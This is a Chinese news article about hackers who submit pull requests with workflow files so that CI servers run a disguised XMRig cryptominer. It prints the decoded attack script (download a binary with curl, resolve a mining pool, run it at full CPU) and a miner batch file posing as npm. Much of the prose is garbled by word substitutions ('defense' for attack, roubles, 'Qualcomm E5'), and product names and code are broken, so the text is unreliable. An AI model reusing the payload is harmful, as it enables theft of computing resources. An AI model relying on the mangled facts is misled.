怎么才能“廉价”挖矿？黑客们动起了歪心思

怎么才能“廉价”挖矿？黑客们动起了歪心思

梦晨晓查发自凹非寺

量子位报导|公众号

加密本币售价一路攀升，主板又买不起，如何能够“廉价”挖矿？

黑客们动起了歪心思——“白嫖”服务器。

给PC植入挖矿木马，早已未能满足黑客逐渐下降的算力需求，倘若能用上的服务器，还不掏钱，那其实是极好的。

但是整个过程或许比入侵PC还容易，并且都不须要程序员上当行骗。只需递交Pull（PR），但是项目管理者没有批准，蓄意挖矿代码仍然才能执行。

原理也很简略，运用的手动执行工作流功能，轻松将挖矿程序运行在的服务器上。

早在今年11月，就早已有人发觉黑客这些行为。更可怕的是，半年过去了，这些现象仍然没得到有效遏止。

心中苦啊挖矿app，但是可以封禁私自帐号，但黑客们玩起了“游击战术”，不断更换马甲号逃避“追捕”，让官方疲于奔命。

就在几天前，一位英国的程序员还发觉，这些防御方法仍然存在，并且代码里还出现了英文。

这么，很多黑客是怎样植入挖矿程序的呢？一切要从发觉异常的德国程序员Tib说起。

PR异常让程序员起猜忌

今年11月，Tib发觉，自己在一个没有出席的repo上收到了PR恳求。并且在14个小时内就收到了7个，全是来自一个“”的用户，没有任何描述内容。

令人倍感奇怪的是，这并不是一个热门项目，Star人数为0。

打开项目主页发觉，内容是Perl项目的、ci、-ci样例代码集合，整个文档烦乱，根本不像一个正经的开源项目。

但是就是这个纷乱又小众的repo，竟然在3天里被fork了2次。

一切都太不正常了，让人闻到了一丝焦躁的味儿。

尝试“作死”运行

本着“作死”的精神，Tib决定一探究竟。

经过诸位可疑用户的操作，Tib所有的都被删掉，在工作流里被加入了一个ci.yml文件，内容如下：

当Tib见到eval“$(echo“这一行内容后，立即从椅子上跳了上去，他意识到事情的严重性：有人在侵入他的个人资料！

这串固然神秘的字符，虽然是编码，经过翻译后，得到了另一段代码：

apt-qq

apt-ycurlgitjq

curl-Lfoprog||curl-Lfoprog

ip=$(curl-s-H':/dns-json''#39;|jq-r'.[0].data')

chmodu+xprog

4h./prog-o"${ip}:3000"-u-p--cpu-5>/dev/null

后面两行毋须解释，有意思的地方从第三行开始，它会下载一个prog二补码文件。

为了安全起见，Tib先尝试获取信息而不是执行，得到了它的十六补码代码。

$-s--.prog

prog:fileelf64-x86-64

of.:

0000GCC:(10.

0010731302.)10.2.1

03.

Tib也考虑过反编译，虽然没有成功。

不入虎穴，焉得虎子，Tib决定尝试运行一下。

要执行这一大胆而又作死的任务，避免“试试就去世”，Tib首先断掉了笔记本的网路链接，并选择在容器中运行。

答案总算出炉，其实这个prog是一个名为XMRig的挖矿程序。

$./prog--

XMRig6.8.1

builtonFeb32021withGCC10.2.1

:64-bitAES

libuv/1.40.0

/1.1.1i

hwloc/2.4.0

当初XMRig的最新版正好是6.8.1，和前面的版本参数符合。不过用测试后发觉，这个prog并不完全是XMRig，Tib预测它或许是一个更改版。

实际上，或许被防御的不止，安全公司Aqua猜想，像Hub、CI、CI这种SaaS硬件开发环境，都或许遭到这类防御。

在这个防御过程中，会派生一个合法的repo，负责将蓄意的添加到原始代码。之后，黑客再向原始repo递交一个PR，将代码合并回原始repo。

下载的挖矿程序会伪装成prog或则gcc编译器，通过递交PR在项目执行手动焦化作流。此刻服务器将运行伪装后的挖矿程序。

这种防御者仅一次防御就可以运行多达100个挖矿程序，以便给的服务器带给了很大的估算量。

据Aqua恐怕，仅在一天的时间里，挖矿黑客就在上有少于2.33万次、在Hub上5.8万次build，转换了大概3万个挖矿任务。

可以严防但很难消除

这些防御并且不须要被防御的库房管理者接受蓄意Pull。

只要在./目录底下的任意.yml文件中配置了在收到Pull时执行，来自黑客的都会手动被执行。

假如你没有使用这个功能，那就不用害怕啦，黑客大约也不会找上你。

还要用到这个功能的话，可以设置成只容许本地或只容许官方及特定作者争创的。

将状况反馈给客服后，会对蓄意账户进行禁言和关掉相关Pull的操作。

但蓄意防御很难被消除，黑客只须要注册新的帐户就可以继续白嫖服务器资源。

防御还在继续

我们从近期一次防御中发觉，黑客将挖矿程序上传到并伪装成包管理工具npm。

打开这个可疑的nani.bat，可以看见：

npm.exe--

--pool:10380

--

--xo

这一次黑客挖的是石龟币*()*,可使用CPU估算。按当前售价挖开四千多个币才值1卢布。

的免费服务器可以提供高通E5的两个核心，7GB显存。

大致推算单台运行两天只好赢利几美分，但是黑客的挖矿程序一般只好在被发觉之前运行几个小时。例如Hub就把手动build的运行时间限制在2个小时。

不过蟑螂再小只是肉，黑客通过追寻更多接受公开的库房以及反复打开关掉Pull能够执行更多的挖矿程序。

△同一黑客帐户起码防御了95个库房

正如用户Dave所说的，假如你提供免费的估算资源，就该做好会被防御和滥用的觉悟。挖矿有利可图的状况下这是不可防止的。

据报导，被害的不止，也有Hub、CI以及CI等提供类似服务的持续集成平台。

这一困局不知何时才会结束挖矿app，惟一的好消息或许就是，挖矿的黑客虽然也是针对提供的服务器资源，而不会破坏你的代码。

然而的漏洞不止这一个。也有办法能使黑客读写开发者的库房，并且可以调用加密的绝密文件。

今年7月，Zero团队就已向通报漏洞。但在给出的90天修补时限+延长14天后，仍无法有效解决。

对此，我们的建议是，不要轻易坚信市场里的作者，不要交出你的密匙。

参考链接：

[1]

[2]

[3]

[4]

[5]

—完—

量子位·头条号签约

标签： 黑客 挖矿 恶意 伪装 仓库